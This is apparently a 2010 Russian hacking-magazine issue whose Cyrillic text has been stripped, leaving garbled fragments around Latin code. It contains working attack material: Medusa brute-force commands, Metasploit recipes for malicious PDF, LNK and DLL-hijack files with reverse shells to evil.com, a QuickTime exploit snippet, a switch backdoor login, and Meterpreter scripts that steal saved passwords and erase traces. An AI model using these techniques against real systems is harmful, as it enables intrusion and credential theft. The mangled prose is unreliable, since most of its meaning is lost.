google.com/evercookie/cache/bcd
google.com/evercookie/cache/bcde
google.com/evercookie/cache/bcde-

, URL history.
CSS History Knocker,
JS- CSS ,
( samy.
pl/csshack). evercookie
Base64 google.com/evercookie/
cache, a ,
. URL-,
, .
. , . history
. ,
, URL -. Base64 .
, ?

, ?
evercookie ,
, ,
10.
,
. ,
, LSO,
HTML5-, ,
, PNG
web history. evercookie
,
, .
. , , .
Local Shared Object .

Evercookie ,
, . .
JS-,
evercookie. Flash- (Local Shared
Object), evercookie.swf,
X 11 /142/ 10

Chrome

, PNG- ETag, PHP-


evercookie_png.php evercookie_etag.php.
evercookie , :
<script type="text/javascript"
src="jquery-1.4.2.min.js"></script>
<script type="text/javascript"
src="swfobject-2.2.min.js"></script>
<script type="text/javascript"
src="evercookie.js"></script>
<script>
var ec = new evercookie();
// cookie "id" "12345"
// : ec.set(key, value)
ec.set("id", "12345");
// "id"
ec.get("id", function(value) {
alert("Cookie value is " + value)
});

,
callback-. :
function getCookie(best_candidate, all_candidates)
{
alert("The retrieved cookie is: " + best_
candidate + "\n" + "You can see what each storage
mechanism returned " + "by looping through the all_
candidates object.");
for (var item in all_candidates)
document.write("Storage mechanism " + item +
" returned: " + all_candidates[item] +
"<br>");
}
ec.get("id", getCookie);
</script>

X 11 /142/ 10

evercookie
SWF- PHP

evercookie . ,
, .

, Flash', .
, evercookie!

. ,
,
. : Google
Chrome, Opera, Internet Explorer Safari
Private Browsing ,
evercookie.
. .
evercookie
,
Isolated Storage Silverlight,
Java-.z

039


GreenDog agrrrdog@gmail.com)

Easy Hack
1

: ,
POP3, FTP, SSH ..

:
,
- . . . ,
- . (
? :) , ...
, . . , , - .
:
123456
Password
iloveyou
princess
rockyou ( )
abc123
Qwerty
Ashley
babygirl
monkey

Medusa . SSH

Medus.
SSH:
medusa -h victim.com -u root -P passwords.txt M ssh

, 32 ,
Imperva (imperva.com/ld/password_report.asp).
. .
, THC-Hydra (freeworld.thc.org/thc-hydra/)
Medusa (foofus.net/~jmk/medusa/medusa.html).
, BackTrack4,

h, -u ;
-P ;
-M .
, .
SMB:

- ( *nix- ).
: , , -

medusa -M smbnt -C combo.txt

. ,
: Medusa , Hydra

combo.txt ::. :

. .
, ,
foofus.net/~jmk/medusa/medusa-

compare.html ( ):
TELNET, AFP, CVS, FTP, HTTP, HTTPS, SOCKS5, HTTP-PROXY,
IMAP, MS-SQL, PostgreSQL, MySQL, NCP (NetWare), NNTP,
PCNFS, PcAnywhere, POP3, rexec, rlogin, rsh, Teamspeak,
SMB, SMBNT, SAP/R3, SMTP (AUTH/VRFY), SNMP, SSHv2, SVN,
Telnet, VmAuthd, VNC, Cisco auth, ICQ, LDAPx ..

192.168.0.2:administrator:password
192.168.0.2:testuser:pass
192.168.0.3:administrator:blah
192.168.0.4:user1:foopass

,
.
, , XHydra :).
. . ,
passwords.ru -

: ,
:). Medusa
2.0, Hydra 5.7. - , .

040

.
awlg.org/index.gen,
, .
X 11 /142/ 10

:
EXE, DLL

:
, ,
, -
. , . , . ,
:). .
, ,
, OllyDbg (wasm.
ru/series.php?sid=17). , ,
- .
. . !
. , , , -
, . . ,
, Quick
Unpack 2.2 (qunpack.ahteam.org/?p=436). ! , , ,
exe. , UPX, ASPack, PE Diminisher,

UPX, QuickUnpack
PECompact, PE-PACK, PackMan, WinUPack .
,
DLL, , ,
, OEP finder,
LUA ( ). ,
:). ,
OEP finder .

:
. , 3G GPRS, , . ,
- . .
.
CanSecWest 2010 Collin
Mulliner
(mulliner.org/security/feed/random_tales_mobile_hacker.pdf).
DoS .
,
, .
,
HTTP-. ,
, ,
, . MSISDN ( ), IMEI (
) IMSI ( ). .
, .

: IP-

:
, , :).
, /
- .
, ,
, VPN,
. ,
X 11 /142/ 10

:
SIM, , - ?
( ) . , , -. , .
mulliner.org/pc.cgi. , ,
. , .
, ,
, , 3G- ,
.

.
. , ,
- .
ipaddresslocation.org, worldips.info,
IP.
, (RIPE, RIPN, etc.) .
RIPN (ru-center) - ipgeobase.ru.
, -
, - ,
- . :).
whois.

041

: WINDOWS ,

:
CC10,
Windows.
, ,
, :). ,
party10.cc.org.ru.
: , , Win7
.
. , ,
. ( , , Adobe, Mozill) .
,
DEP, ASLR ..
. ,
.
.
! MS , ,
, (
) , .
EMET 2.0, Enhanced Mitigation Experience Toolkit (blogs.technet.
com/b/srd/archive/2010/09/02/enhanced-mitigation-experience-toolkitemet-v2-0-0.aspx)
DEP,
SEHOP, ASLR , . ,
( , ) : DEP, ASLR, SEHOP,
heapspay .
, , , .
. MS: 0day-

ASLR Acrobat Reader.


DLL EMET -ASLR-, ROP

Acrobat Reader Win7 DEP, ROP,


, -ASLR- EMET
(blogs.technet.com/b/srd/archive/2010/09/10/use-emet-2-0-to-block-theadobe-0-day-exploit.aspx)
: technet.microsoft.com/en-us/security/ff859539.
aspx
WinXP c SP3, SEHOP
ASLR .
Win7 Win2008.

: ,
CLIENT-SIDE-

:
. -.
?
:). ,
- .
. ,
, DoS, . ,
, IDS, .
/, ,
, .
/
:). ,
Microsoft Adobe, - . ,
! :
Adobe Acrobat PDF Cooltype Sing ( <=9.3.4/8.2.4), MS DLL Hijacking,
MS LNK (MS10-046).

. , Metasploit
Framework. MSF
.
MSF, PoC. 0-day,
MSF. - , .
1) Adobe Acrobat PDF Cooltype Sing. Adobe
. . msfconsole :

042

Acrobat Reader. :)
:
msf > use exploit/windows/fileformat/adobe_cooltype_
sing
:
msf > set FILENAME xakep_ubileinyi_vypusk.pdf
? home:
msf > set OUTPUTPATH ~
:
msf > set PAYLOAD windows/shell/reverse_tcp
msf > set LHOST evil.com
X 11 /142/ 10

MS Office

msf > set LPORT 80

evil.com netcat, ,
.
, -, NAT, ,
-, (
Acrobat Reader).
,
Adobe exploit/windows/browser/adobe_cooltype_
sing.
2) MS LNK (MS10-046). :)
:
msf >use windows/browser/ms10_046_shortcut_icon_
dllloader
:
msf >set PAYLOAD windows/meterpreter/reverse_tcp
msf >set LHOST 192.168.0.101

, WebDAV .
,
. (
WebDAV). - :).
DLL .
, , .
$msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.0.101 D > evil.dll

:
windows/meterpreter/reverse_tcp ,
X 11 /142/ 10

LHOST=192.168.0.101
D , DLL;
evil.dll .

3) MS DLL Hijacking
! - .
-
AutoCAD, . - . . , , , !
. !
:).
:
:
msf > use windows/browser/webdav_dll_hijacker
:
msf > set BASENAME policy
:
msf > set EXTENSIONS ppt
:
msf > set SHARENAME docs
:
msf > set PAYLOAD windows/meterpreter/bind_tcp

\\192.168.0.101\
docs\, HTTP- http://192.168.0.101:80.
. :).
, ,
WebDAV. z

043


, Digital Security a.sintsov@dsec.ru

01

DLL
HIJACKING

TARGETS

Windows XP
WIndows 7
Windows 2000/2003/2008
CVE

N/A
BRIEF

- Microsoft.
. , (Simon
Raner) Arcos Apple iTunes , , DLL-
. ,
, .
,
WebDAV.
, - . , Apple iTunes,
DLL, . ,
2010 ,
, 2000 . , 10
(Georgi Guninski)
, Windows
.DLL-, Microsoft
Office. , , , ,
, , . (, ,
). , ,
, Metasploit.
, ,
, , .
EXPLOIT

.
Windows :). , , .
, API- LoadLibrary

044

( ). ,
, DLL; ,
:
LoadLibrary("bzik.dll");

, DLL- ,
, .
Windows , ,
, :
1.
2.
3.
4.
5.
6.

, ;
;
16- ;
Windows;
;
PATH.

,
, . , (.TXT- ,
.TORRENT uTorrent, .XLS Excel ..) D:\zloba,
.
, , ,
. ,
HTTP WebDAV. , bzik.dll
PATH, ,
, , bzik.dll , D:\zloba,
PATH. ,
D:\zloba bzik.dll?
. : , DLL-,
,
. uTorrent, P2P,
.TORRENT.
,
.
c .TORRENT.
, ProcessExplorer,
utorrent.exe.
.
.TORRENT- . ,
X 11 /142/ 10

DLL Hijacking
utorrent.exe
. -
.DLL- ,
plugin_dll.dll. plugin_dll.dll
.
,
msfpayload Metasploit:
$ msfpayload windows/exec CMD=calc D > plugin_dll.dll

- .TORRENT-
, . , , Rapid7 https://www.metasploit.
com/redmine/projects/framework/repository/raw/external/source/
DLLHijackAuditKit.zip ( FAQ United). , exploit-db.com/
dll-hijacking-vulnerable-applications/.
DLL,
API- ,
(Taeho Kwon) (Zhendong
Su) cs.ucdavis.edu/research/tech-reports/2010/CSE-20102.pdf. ,
, ,
, .

DLL Hijacking
, ,
:
SetDllDirectory("");

, LoadLibrary.

02

APPLE
QUICKTIME

TARGETS
SOLUTION
,
, Microsoft - , :
;

WebDAV;

WebDAV, .

X 11 /142/ 10

* Apple QuickTime < 7.6.8


CVE

CVE-2010-1818
BRIEF
,
, , , ..
- .
, . ,

Apple, QuickTime.
,

045

DLL Hijacking
QuickTime
- (Ruben Santamarta)
ActiveX- QuickTime.
EXPLOIT

,
_Marshaled_pUnk. ActiveX
:
push
offset a_marshaled_pun ; "_Marshaled_pUnk"
push
ebx
;
call
ebp ; lstrcmpiA ; "_Marshaled_pUnk"
test
eax, eax
; ?
jnz
short loc_10002C4A ; , -
;
push
edi
call
sub_10001310
; LONG
add
esp, 4
lea
ecx, [esi+13B8h]
push
ecx
; ppv
push
offset iid
; iid
; (4 )
push
eax
call
ds:CoGetInterfaceAndReleaseStream ;
, iStream (eax)!

, , _Marshaled_
pUnk, . , ,
. ,
QuickTime (6.5.1.17)
,
, ,
. ,
, ,
. ,
, iStream
vTable. , Heap
Spray , ROP-
DEP . ROP
vTable:
Heap addr
Value
15220c20
15220c18 // VTable
-- ALL[15220c18+0x0C]

046

15220c24

15220c28
15220c2c
15220c30

ROP_ADDR // ROP-
ROP_ADDR // ROP-
ROP_ADDR
ROP_ADDR

Heap Spray 0x15220000,


:
var targ = 0x15220c20;
var obj = '<' + 'object classid="clsid:02BF25D5-8C174B23-BC80-D3488ABDDC6B" width="0" height="0"' + '>'
+ '<' + 'PARAM name="_Marshaled_pUnk" value="' + targ +
'"' + '/>'
+ '</'+ 'object>';
document.getElementById('xpl').innerHTML = obj;

Metasploit,
QuickTime :).
, 7.6.7
Windows XP SP3. ASLR, . , ROP-,
ASLR.

SOLUTION


QuickTime ( 7.6.8).

03

TARGETS

* 3Com 3812
* 3Com 3870
* Edgecore ES4649
* Dell PowerConnect 5224
*
CVE

N/A
X 11 /142/ 10


:)
BRIEF

,
, HAR2009,
(Edwin Eefting), (Erik Smit)
(Erwin Drent) , , Accton,
.
, ,
, , , .
,
, , . , ,
?
EXPLOIT

: Linux ,
-
: __super. - ,
, . ,
,
,
, .
, ,
MAC- . , ,
MAC, , , ...
. , - ,
, .
- , MAC-. ,
, , ARP-, , , SNMP-.
, SSH,
telnet- HTTP-. __super.
:
1. MAC :
# arp -an | grep 10.0.1.2
? (10.0.1.2) at 00:0E:6A:CB:B4:41 [ether] on eth0

Acrobat Reader , VeriSign


# perl accton.pl 000E6ACBB441
!!98DMlH

3. :
# telnet 10.0.1.2
Trying 10.0.1.2...
Connected to 10.0.1.2.
Escape character is '^]'.
Login: __super
Password: !!98DMlH
Menu options: -------3Com SuperStack 3 Switch 3824 24port--------------------bridge
- Administer bridge-wide parameters
feature
- Administer system features
gettingStarted - Basic device configuration
logout
- Logout of the Command Line Interface
physicalInterface - Administer physical interfaces
protocol
- Administer protocols
security
- Administer security
system
- Administer system-level functions
trafficManagement - Administer traffic management

MAC-.
, :).
SOLUTION


IP-:

2. :
X 11 /142/ 10

047

Acrobat Reader
Console#config
Console(config)#management ?
all-client Adds IP addresses to SNMP, Web and Telnet
groups
http-client Adds IP addresses to the Web group
snmp-client Adds IP addresses to the SNMP group
telnet-client Adds IP addresses to the Telnet group
Console(config)#management all-client ?
A.B.C.D Starts IP address
Console(config)#management all-client 192.168.1.1 ?
A.B.C.D Ends IP address
Console(config)#management all-client 192.168.1.1
192.168.1.10

, ,
.
- . , ,
, , . -
Full-Disclosure :).

04

Acrobat Reader,

.
.
,
DEP, ASLR.
ROP , ASLR. -
,
. , PDF-

. .
EXPLOIT
. , , . ,
Acrobat Reader SIGN- TrueType.

-...

ADOBE ACROBAT READER

TARGETS

* Adobe Acrobat Reader <= 9.3.4


CVE

CVE-2010-2883

048
48

BRIEF

Abysssec 0-day.
, ,
, Po.
Micrososft, Mozilla, Sun, Novell, HP ..
exploit-db.com,
, . abysssec.com/
blog/2010/09/moaub-1.

X 11 /142/ 10

Acrobat Reader Windows 7


, uniqueName,
. ,
strcat.
. ,
uniqueName ,
.
:
ROP-,
0x0C0C0C0C. Heap Spray ROP. , , . DEP. ,

API-, VirtualProtect/VirtualAlloc WriteProcessMemory,
. iso88591 ,
API- CreateFileA. ROP-
CreateFileMappingA,
MapViewOfFile .
DEP.
LPVOID MapViewOfFile(
HANDLE hFileMappingObject, // . X 11 /142/ 10

(, CreateFileMappingA)
DWORD dwDesiredAccess, // ( 0x22 FILE_MAP_EXECUTE | FILE_MAP_WRITE)
DWORD dwFileOffsetHigh, // DWORD - 0
DWORD dwFileOffsetLow, // DWORD - 0
SIZE_T dwNumberOfBytesToMap // - 0x1000
);

,
, .

( memcpy).
,
. ROP DEP, ASLR,
ROP-
icucnv34.dll, ASLR,
, Windows 7.
,
Metasploit !
SOLUTION

Adobe Acrobat Reader .z

049


, Digital Security a.sintsov@dsec.ru

BANK
CLIENT

-:


- (IPS, AntiVirus, ); , ,
.
.
, WEBMONEY PAYPAL,
,
.
, ,
, -
.

050

, ,
, .
, ,
. ,
, ( X 11 /142/ 10

Inter-PRO - BoF
), -. :
, ,
. .
(
),
.

(, ..), , , .
. ()
,

/ / , . - , ,
.
( ). ,
(, , ..) , .
, . ,
, , .
. , :
1. -;
2. ;
3. ( );
4. ;
5. ;
6. .

. -, .. ..

,
-. :

-
-
-
-
ATM-

, ,
. ,
! , ,
X 11 /142/ 10


34.10 2001 (: )
,
.
,
, ,
, , , , .

. ,
- (
Java) , , , Java- ActiveX,
( ,
). ActiveX? ,
Windows
. ,
.

-
, , , ActiveX ,
.
, .

, ,
. ,
.

.
, , .. .
,
.
, .

, ? -,

051

, , ,

.
, , , - , .
,
,
- () ( ).
.
, ,
, -
-. , , , ,
, , , ,
. ? :) .
1 ERP- , ,
, .

: - , . ,
, ,

. , ,
, . ,
, ,
, .
, ,
. , - ,
, , , . , ,
, , ,
, , ,
, . ,
, ( ,
). ,
,
(). ,
!
34.10 2001. - 34.11-94.
,
.

USB-Token

, - .. , USBToken . USB-Token?
USB-,
. -

052

-
, ,
( )
. , . , ,
R-Admin,
USB . ,
,
. USB-Token . , .
Token ..,
,
.
: , ,
, , , , -,
.

, , ,
. :

WiFi

, (
)
WiFi ( WEP,
, WiFi,
MAC-, 3Com-,
3Com-, ,
, ).
- , ,
,
IP-
( ARP-SPOOF
HASH+CONST handshake Ranibow-Table profit!).
, ,
, netbios
: BANK01, BANK02. ,
, ,
-
. WiFi-,
, .
X 11 /142/ 10

.
, , ,
,
- :). ,
, ... ,
,
, ..

-
USB-oken,
, -,
, .
( , , 2-3
WiFi-, , ) ,
.
- , ,
. .
: , ,
, ,
,
HDD . , IDS IP , ,
.

.
,
. , , ,
, -
. -
, .
, , ,
. , ,
, -.
, , ,
, exploit-pack, Acrobat Reader, - .
. , -
. .
, , . : ,
. .
- , - - .
ERP- ( 1C, ),
( ) , ( , )
, , 700 .
,
, - . , . , -, , ,
.
, -,
X 11 /142/ 10

, - , ( USB), ,
.. ..
( ][ #112,
). , /
, , .
, , ,
USB-Token , ,
- ,
( ).
.
, , , ,
. ,
. , ,
. . -, ,
N, ,
.
. , ,
, . -
,
, , ,
:). ,
, (, ,
) . , . , , , , !

, , .
, , ,
- ,
.
: XSS-, SQL-,
, ..,
.. ,
- -. ,
, , ,
,
, .
:
, , , , , .
: .
, , .
, ,
, (
CSRF) , update . ,
,
.
SQL- XSS

053

0day

, - .
, ,
, ActiveX -
(BSS). ,
, ,
.
,
. .
(Inist, R-Style).
,
ActiveX (
CC10
?.
.
). ,
ActiveX, , ,
Faktura.ru :). (
). ,
. ,
... ,
, . ,
ActiveX, ,
( , DSecRG,

). , -
ActiveX, ,
( ,
).
, , Inter-PRO - , .
, ( , ). ,
( ActiveX,
- ). ( )
, Inter-PRO (DoS).
, , ( ),
-.

(
, , -,
). , . , -

054

/GS (, GS,
,
DoS Code Execution). ,
, Permanent DEP, ASLR, SEHOP, GS
, . InterPRO GS, , . ,
Flash, Acrobat Reader, Windows
..,
, -
( , ).

? , ,
, ,
- , .

1) ;
2)
;

3) ;
4) USB-oken

!
5) ;
6) , ,
. ;
7)
IP , ( );

8) -;
9) , , . ;

10) ;
11) ,
, .
, , ,
, , . - ,
-, , , - .
.
, ,
...z
X 11 /142/ 10

r GreenDog agrrrdog@gmail.com

METERPRETER

MSF

,
Metasploit Framework. , MSF
Meterpreter. advanced payload ,
, , .
MSF METERPRETER
( )
, -
. , msfgui, . msfgui
:).
, , MSF,
Meterpreter (MP) - . , .

Meterpreter , MSF , ,
- .
(/bin/sh, cmd.exe)?
, :). ,
, . -,
.
. -, IDS
: , -,
. -, chroot, ,
X 11 /142/ 10

. -, ,
, , .

.
, , ?. -, MP .
?
:). . ,
MP ,
.
Windows- ( ,
cmd.exe -
:). Linux ,
. Mac 2009 Charlie Miller Vincenzo Iozzo.
Win- MP ( ,
).
dll .
MP . - MP dll,

. , MP

055

.bashrc

, , . , MSF. Ruby,
Meterpreter API :). -, .
MP- hashdump
- ( h :), ][
.

Railgun. ,

dll . MP
DLL: dll injection reflective dll injection.
. ,
(PEB) . .
chroot / MP
.
, / ,
/. - MP ,
dll ,
, MP . -
Meterpreter xor.
MP .
, heap jit-
, , ,
.
, , ,
. ( ) . -
. MP (migrate)
. , -,
- (
), , -,

, .

056

MP , .
. ,
, MP .
,
MP -. , antimeter2 mertsarica.com
MP.

meterpreter

. , MP Win, .
MP PHP JAVA.
? :).
. ,
MP, .
PHP MP php ,
- - ,
LFI SQL-. , dll-
. ,
, , , .
, , . PHP JAVA MP
.

MP, , .
,
. API Rex ( MSF) MSF. API metasploit
( ), (2004 .) MP, - , API (
\msf3\documentation). ,
, -
X 11 /142/ 10

Meterpreter
MP
.
(, , :).
, .
,
API. , .
:
r=client.sys.process.execute("command.exe", nil,
{'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close

:
cmd_exec(cmd)

. :
key = 'HKLM\\System\\...'
root_key, base_key = session.sys.registry.
splitkey(key)
value = "Value"
open_key = session.sys.registry.open_key(root_key,
base_key, KEY_WRITE)
open_key.set_value(value, session.sys.registry.
type2str("REG_DWORD"), 0)

:
registry_setvaldata(key,valname,data,type)

, MSF

MSF.
MSF . , .
.
-, MSF *nix Meterpreter.
UTF, MP cp1251, 866. ,
, .
http://takeworld.blogspot.com/2008_11_01_archive.html.
MSF
cygwin.
.bashrc, , :
export LANG="ru_RU.CP1251"
alias ls='ls --show-control-chars'
X 11 /142/ 10

(\msf3\lib\msf\). MP ,
.
( MSF
). MP
Carlos Perez. , darkoperator.com,
, , .
:
run bgrun ;
session s msf-;
AutoRunScript InitialAutoRunScript .
, :
metsvc, scheduleme, persistence MP
;
autoroute
;
scraper, checkvm, winenum, get_env, enum_powershell_
env, enum_logged_on_users, domain_list_gen,
remotewinenum ;
get_local_subnets, netenum, arp_scanner, dumplinks
;
get_application_list, enum_vmware, prefetchtool
;
getgui, gettelnet, vnc RDP, telnet
VNC-;
getcountermeasure, killav AV, UAC, ;
hashdump, credcollect, , ;
winbf ;
screen_unlock ;
wmic wmic-;
schtasksabuse ;
enum_firefox, enum_putty, getvncpw, get_filezilla_
creds, get_pidgin_creds ;
panda_2007_pavsrv51, pml_driver_config, srt_webdrive_
priv, kitrap0d ;
search_dwld, file_collector - ;
migrate, keylogrecorder, packetrecorder
MP;
multicommand, multiscript, uploadexec
.

, . , -
. .
.
,
, , , ,
. ,
nirsoft.
net, ,
. ( ) :
session = client
host,port = session.tunnel_peer.split(':')

057

Windows File Protection.

end
r.channel.close
r.close
#
session.sys.process.execute("cmd.exe /c del
#{tmp}\\#{passrecscranble}.exe", nil,
{'Hidden' => 'true'})
#


RDP

session.fs.file.download_file(
"#{logs}#{::File::Separator}#{exename}.txt",
"#{tmp}\\#{logscranble}")

# Temp
tmp = session.fs.file.expand_path("%TEMP%")

print_status(
"Finnished downloading logs with passwords")

# ,

session.sys.process.execute(

logs = ::File.join(Msf::Config.config_directory,
'logs', 'getpass',

"cmd.exe /c del #{tmp}\\#{logscranble}",


nil, {'Hidden' => 'true'})

host + "-"+ ::Time.now.strftime("%Y%m%d.%M%S"))

getpass(session,tmp,logs,"PasswordFox.exe")

, ,
. : ,
, PasswordFox.exe data msf3.

def getpass(session,tmp,logs,exename)

::FileUtils.mkdir_p(logs)
#

# ,
#
passrecexe = File.join(Msf::Config.install_root,
"data", "#{exename}")
passrecscranble = sprintf("%.5d",rand(100000))
logscranble = sprintf("%.5d",rand(100000))
session.fs.file.upload_file(
"#{tmp}\\#{passrecscranble}.exe",

. , .
. Patrick HVE - MP.
Railgun! ? .
API. ,
dll . , ?
:) MP ( irb):

"#{passrecexe}")
#
#

>>client.core.use("railgun")
>>client.railgun.user32.MessageBoxA(0,"Hello,
world!","Test","MB_OK")

r = session.sys.process.execute("cmd.
exe /c #{tmp}\\#{passrecscranble}.exe /stext
#{tmp}\\#{logscranble}", nil,
{'Hidden' => 'true','Channelized' => true})
sleep(2)
#
prog2check = "#{passrecscranble}.exe"
found = 0
while found == 0
session.sys.process.get_processes().each do |x|
found =1
if prog2check == (x['name'].downcase)
print "."
sleep(0.5)

, .
railgun:
1) client.railgun.{DLL-Name}.{FunctionName}
({Parameters});
2) . ,
return GetLastError;
3) . api_constants.rb;
4) NULL, nil;
5) , .
railgun (. msf3\lib\rex\post\meterpreter\extensions\
railgun\api.rb) 1000 API kernel32, user32, ntdll,
ws2_32. , dll:

found = 0
end
end

058

>>client.railgun.add_dll('smartcard','c:\\program
files\\smartcard\\smrtcrd7823.dll')
X 11 /142/ 10

=>
>>
=>
>>



:
railgun.add_function( 'kernel32',
'ReadFile', 'BOOL',[
["DWORD","hFile","in"],
["PBLOB","lpBuffer","out"],
["DWORD","nNumberOfBytesToRead","in"],
["PDWORD","lpNumberOfBytesRead","out"],
["PBLOB","lpOverlapped","inout"],
])


railgun.
.
( ):
#
client.core.use("railgun")
#
a = client.railgun.kernel32.
GetLogicalDrives()["return"]
#
drives = []
letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
(0..25).each do |i|
test = letters[i,1]
rem = a % (2**(i+1))
if rem > 0
drives << test
a = a - rem
end
end
print_line("Drives Available = #{drives.
inspect}")

:
MP
meterpreter > bgrun keylogrecorder -c 1 -t
15

meterpreter > irb
>> client.core.use("railgun")
X 11 /142/ 10

true
client.railgun.user32.LockWorkStation()
{"GetLastError"=>0, "return"=>true}
exit

,
, . ,
,
.
m0r0 :
. , : forum.antichat.ru/
threadnav99665-1-10.html. : -
WinXP,
RDP. termsrv.dll .
RDP,
. , ,
Windows File
Protection , dll. . MP
. , railgun,
.
, .
, ,
WinAPI. WinAPI. -, MP
,
:
kernel32.MoveFileA("c:\\windows\\system32\\
termsrv.dll","c:\\windows\\system32\\
termsrv.old")

-,
:
parHWND=user32.FindWindowA("#32770",nil)

:
chHWND=user32.FindWindowExA(parHWND["return
"],0,nil,
"#{cancel}")

:
user32.PostMessageA(chHWND["return"],
"WM_LBUTTONDOWN",0,0)
user32.PostMessageA(chHWND["return"],
"WM_LBUTTONUP",0,0)

HTTP://WWW
links
PHP Meterpreter
blog.metasploit.
com/2010/06/meterpreter-for-pwnedhome-pages.html
Java Meterpreter
schierlm.users.
sourceforge.net/
JavaPayload/
metasploit.com/redmine/issues/406
metasploit
metasploit.com

meterpreter API
metasploit.com/
documents/meterpreter.pdf
MP
darkoperator.com
WinAPI
Railgun
msdn.microsoft.
com/en-us/library/
aa383749

msdn.microsoft.
com/en-us/library/
ms681381
(VS.85).aspx
WinAPI
undocumented.
ntinternals.net/;
source.winehq.org/
WineAPI/

dll injection nologin.org/


Downloads/Papers/
remote-library-injection.pdf
Reflective dll injection harmonysecurity.com/ReflectiveDllInjection.html
harmonysecurity.com/
files/HS-P005_ReflectiveDllInjection.pdf

.
MSF :).

, Meterpreter ,
,
, , .
! , . :).z

059


r0064 r0064@mail.ru

Windbg

Windbg ,
. , , ...
.
,
64- .
, , X64- WINDBG ,
64- WINDOWS,
32-
.

WinDbg . :

, (
, ). Ida.
interfaces. ,
( ). interfaces
.
, :
.text:0000000180012920

public interfaces

.text:0000000180012920

interfaces proc near

.text:0000000180012920

mov [rsp+arg_18], r9d

.text:0000000180012925

mov [rsp+arg_10], r8

.text:000000018001292A

mov [rsp+arg_8], rdx

.load _

.unload.
, ndis, ndiskd, Windbg 6.11.1.404
(ndiskd.dll WDK \Debugging
Tools for Windows (x64)\winxp). , !ndiskd.interfaces :
Can't get offset of Link in NDIS_IF_BLOCK!.
opens, protocols . , . ,

060

.text:000000018001292F

mov [rsp+arg_0], rcx

.text:0000000180012934

push rbx

....
.text:00000001800129AF

lea r8, [rsp+0C8h+var_2C]

.text:00000001800129B7

lea rdx, aLink ; "Link"

.text:00000001800129BE

mov rcx, cs:NDIS_IF_BLOCK_NAME

; Link NDIS_IF_BLOCK
.text:00000001800129C5

call GetFieldOffset

.text:00000001800129CA

test eax, eax


X 11 /142/ 10

WinDbg fdbg

.text:00000001800129CC

jz short loc_1800129E0

.text:00000001800129CE

lea rcx, aCanTGetOffs_22

DriverEntry ?
, , int 3 ,
. ? , . , WinDbg
,
. . IopLoadDriver. ,
, ,
( ,
). Vista (
, IopLoadDriver):

; "Can't get offset of Link in NDIS_IF_BLO"...


.text:00000001800129D5
call cs:ExtensionApis.lpOutputRoutine+4
.text:00000001800129DB

jmp loc_180012BF1

, Link NDIS_IF_BLOCK_NAME. ,
NDIS_IF_BLOCK_NAME.
.text:0000000180001260 aNdisNdis_if_bl db 'ndis!NDIS_
IF_BLOCK',0

:
dt ndis!NDIS_IF_BLOCK

, : Symbol ndis!NDIS_
IF_BLOCK not found. dt ndis!_NDIS_IF_BLOCK . ,
, . - hex-.
010 Editor. . ,
, .
.
, ,
, .
, ndis!LIST_ENTRY :
.data:0000000180018470 LIST_ENTRY_NAME dq offset
aNdis_list_entr ; DATA XREF: pktpools+5Dr

, 68
14 00 80 01 00 00 00. -
.
ndiskd .
X 11 /142/ 10

PAGE:00000001403AC40A loc_1403AC40A:
PAGE:00000001403AC40A
; IopLoadDriver+98Bj
PAGE:00000001403AC40A mov
rdx, rsi
PAGE:00000001403AC40D mov
rcx, rbx
PAGE:00000001403AC410 call
qword ptr [rbx+58h]
; DRIVER_OBJECT.DriverInit

, , 0x58 DRIVER_OBJECT
DriverInit, kd dt _DRIVER_
OBJECT.
:
48 8B D6 48 8B CB FF 53

58

,
WinDbg:
s nt!IopLoadDriver L2000 48 8B D6 48 8B CB FF 53

58

s , nt!IopLoadDriver
, L2000 ,
, 48 8B D6 48 8B CB FF 53 58 , .
- :
fffff800`01c0940a 48 8b d6 48 8b cb ff 53-58 4c 8b
15 5e 20 dd ff H..H...SXL..^ ..

.
. fffff800`01c0940a. .
, int 3 .

WinDbg ,
. . -

061

ndiskd

ida


Major- DRIVER_OBJECT, driver object .

!drvobj .
driver object tdx.sys.

.block
{
.catch
{
r $t0 = $arg1
.printf "Driver object at 0x%I64X\n",@$t0
r? $t1 = (nt!_DRIVER_OBJECT*)@$t0
r $t0 = @@c++(@$t1->Type)
.if(@$t0==4)
{
r $t0 = @@c++(@$t1->MajorFunction)
.for(r $t1=0;@$t1<1c;r $t1=@$t1+1)
{
r $t2 = @$t0+@$t1*8
r? $t3 = *(void**)@$t2
.printf " Function at 0x%I64X\n",@$t3
.if(@$t3!=0)
{
bp @$t3
}
}
}.else
{
.printf "Not a driver object!\n"
}
}
}

$arg1 ( $argN), t0-t19


-. , ++ (
for, while...). DRIVER_OBJECT.
Type, , DRIVER_
OBJECT ( !).
DRIVER_OBJECT.
MajorFunction. Major- (
27 - 0x1b).
( ), (bp @$t3). .printf. 64- (8 ), r $t2
= @$t0+@$t1*8. 32- ,
4.

r, , r?, .

- -

062

kd> !drvobj tdx


Driver object (fffffa8001ea1330) is for:
\Driver\tdx
Driver Extension List: (id , addr)
Device Object list:
fffffa8001ec72f0 fffffa8001ec52f0
fffffa8001ec12f0
fffffa8001ebf2f0 fffffa8001ebd2f0

fffffa8001ec32f0
fffffa8001eb5300

.
$$><_, $$<_ ( $<).
,
$$>a<_ ( ).
,
device objecta, .
$$ $arg1 - device object
$$ $arg2 - function number
.block
{
.catch
{
r $t0 = $arg1
.printf "Driver object at 0x%I64X\n",@$t0
r? $t1 = (nt!_DRIVER_OBJECT*)@$t0
r $t0 = @@c++(@$t1->Type)
.if(@$t0==4)
{
r $t0 = @@c++(@$t1->MajorFunction)
r $t1 = $arg2
$$checking second argument
.if(@$t1<1c)
{
r $t2 = @$t0+@$t1*8
r? $t3 = *(void**)@$t2
.printf " Function at 0x%I64X\n",@$t3
.if(@$t3!=0)
{
bp @$t3
u @$t3
}
.else
{
.printf "Invalid function address\n"
}
}
.else
X 11 /142/ 10

{
.printf "Invalid function number: must be
0-1B\n"
}
}.else
{
.printf "Not a driver object!\n"
}
}
}

$$.
. DeviceObject.Type=4,
0-1B, IRP_MJ_CREATE IRP_MJ_PNP.
u @$t3
.
(
):
kd> $$>a<c:\do2.wds fffffa8001ea1330 2
Driver object at 0xFFFFFA8001EA1330
Function at 0xFFFFFA600A60D830
tdx!TdxTdiDispatchClose:
fffffa60`0a60d830
push rbx
fffffa60`0a60d832
sub rsp,20h
fffffa60`0a60d836
cmp rcx,qword ptr
[tdx!TdxDeviceObject (fffffa60`0a61e650)]
fffffa60`0a60d83d
